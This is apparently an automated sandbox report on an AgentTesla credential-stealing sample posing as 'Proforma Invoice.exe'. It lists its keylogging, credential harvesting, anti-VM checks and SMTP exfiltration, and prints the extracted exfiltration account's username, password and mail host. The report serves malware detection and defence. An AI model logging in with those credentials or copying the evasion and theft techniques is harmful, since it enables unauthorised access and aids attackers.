
Windows Analysis Report Proforma Invoice.exe

Overview

General Information

Sample Name: Proforma Invoice.exe
Analysis ID: 502592
MD5: dd00dde252a92512815c0d0d3679d1fd
SHA1: 44ca2aa75de6ca79ae39408b48cd605d384a9a9b
SHA256: c0057025e69297714ba47f8fc982ec8fd8713f5a270a2d638257bcc395cad39f
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM3
Installs a global keyboard hook
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Executable has a suspicious name (potential lure to open the executable)
Moves itself to temp directory
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • Proforma Invoice.exe (PID: 6844 cmdline: 'C:\Users\user\Desktop\Proforma Invoice.exe' MD5: DD00DDE252A92512815C0D0D3679D1FD)
    • Proforma Invoice.exe (PID: 5608 cmdline: C:\Users\user\Desktop\Proforma Invoice.exe MD5: DD00DDE252A92512815C0D0D3679D1FD)
    • Proforma Invoice.exe (PID: 6804 cmdline: C:\Users\user\Desktop\Proforma Invoice.exe MD5: DD00DDE252A92512815C0D0D3679D1FD)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "kendakenda@karanex.com", "Password": "zarazita404", "Host": "webmail.karanex.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security

Unpacked PEs

Source | Rule | Description | Author
0.2.Proforma Invoice.exe.3846860.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.Proforma Invoice.exe.3846860.2.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
4.2.Proforma Invoice.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
4.2.Proforma Invoice.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.Proforma Invoice.exe.3846860.2.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 4.2.Proforma Invoice.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "kendakenda@karanex.com", "Password": "zarazita404", "Host": "webmail.karanex.com"}
Machine Learning detection for sample
Source: Proforma Invoice.exe | Joe Sandbox ML: detected
Source: 4.2.Proforma Invoice.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: Proforma Invoice.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Proforma Invoice.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49841 -> 185.8.128.141:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49842 -> 185.8.128.141:587
Source: Joe Sandbox View | ASN Name: ALASTYRTR
Source: Joe Sandbox View | IP Address: 185.8.128.141
Source: global traffic | TCP traffic: 192.168.2.3:49841 -> 185.8.128.141:587
Source: Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: http://LqBkoD7aW7iu.org
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: http://rafeBU.com
Source: Proforma Invoice.exe, 00000004.00000002.562871223.000000000319E000.00000004.00000001.sdmp | String found in binary or memory: http://webmail.karanex.com
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%$
Source: Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: Proforma Invoice.exe, 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp, Proforma Invoice.exe, 00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | DNS traffic detected: queries for: webmail.karanex.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Proforma Invoice.exe
Contains functionality to register a low level keyboard hook
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Code function: 4_2_013627B4 SetWindowsHookExW 0000000D,00000000,?,?
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Proforma Invoice.exe
.NET source code contains very large array initializations
Source: 4.2.Proforma Invoice.exe.400000.0.unpack, <PrivateImplementationDetails>{334B4886-2F78-4310-AD8D-8030633F3870}/5BFC86F3-17F0-46D9-B37A-34C66161B569.cs | Large array initialization: .cctor: array initializer size 12019
Executable has a suspicious name (potential lure to open the executable)
Source: Proforma Invoice.exe | Static file information: Suspicious name
Source: Proforma Invoice.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Proforma Invoice.exe | Binary or memory string: OriginalFilename vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dll< vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamejKFYOWLbQkFBIMPfWhghzZgVT.exe4 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameriched20.dllp( vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmp | Binary or memory string: yl,\\StringFileInfo\\000004B0\\OriginalFilename vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamejKFYOWLbQkFBIMPfWhghzZgVT.exe4 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000004.00000002.560597448.0000000000F38000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Proforma Invoice.exe
Source: Proforma Invoice.exe | Binary or memory string: OriginalFilenamec.exe8 vs Proforma Invoice.exe
Source: Proforma Invoice.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\Proforma Invoice.exe 'C:\Users\user\Desktop\Proforma Invoice.exe'
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Process created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Users\user\Desktop\Proforma Invoice.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Proforma Invoice.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Proforma Invoice.exe.log
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@5/2@1/1
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: 4.2.Proforma Invoice.exe.400000.0.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Proforma Invoice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Proforma Invoice.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

.NET source code contains potential unpacker
Source: Proforma Invoice.exe, WinUsbInitForm.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.Proforma Invoice.exe.2a0000.0.unpack, WinUsbInitForm.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Proforma Invoice.exe.2a0000.0.unpack, WinUsbInitForm.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.Proforma Invoice.exe.2e0000.0.unpack, WinUsbInitForm.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.2.Proforma Invoice.exe.2e0000.0.unpack, WinUsbInitForm.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.Proforma Invoice.exe.b20000.1.unpack, WinUsbInitForm.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.Proforma Invoice.exe.b20000.0.unpack, WinUsbInitForm.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Code function: 4_2_02DEDF16 push FFFFFF8Bh; iretd
Source: initial sample | Static PE information: section name: .text entropy: 7.95675018012

Hooking and other Techniques for Hiding and Protection:

Moves itself to temp directory
Source: c:\users\user\desktop\proforma invoice.exe | File moved: C:\Users\user\AppData\Local\Temp\tmpG154.tmp
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Yara detected AntiVM3
                      Source: Yara match | File source: 0.2.Proforma Invoice.exe.25f0050.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: Proforma Invoice.exe PID: 6844, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
                      Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 6928 | Thread sleep time: -45834s >= -30000s
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 6900 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 6520 | Thread sleep time: -12912720851596678s >= -30000s
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 2336 | Thread sleep count: 1241 > 30
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 2336 | Thread sleep count: 8607 > 30
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Window / User API: threadDelayed 1241
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Window / User API: threadDelayed 8607
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Thread delayed: delay time: 45834
                      Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmp | Binary or memory string: vmware
                      Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Code function: 4_2_0129CC08 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Memory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Process created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
                      Source: Proforma Invoice.exe, 00000004.00000002.561875686.00000000017E0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
                      Source: Proforma Invoice.exe, 00000004.00000002.561875686.00000000017E0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: Proforma Invoice.exe, 00000004.00000002.561875686.00000000017E0000.00000002.00020000.sdmp | Binary or memory string: Progman
                      Source: Proforma Invoice.exe, 00000004.00000002.561875686.00000000017E0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Users\user\Desktop\Proforma Invoice.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
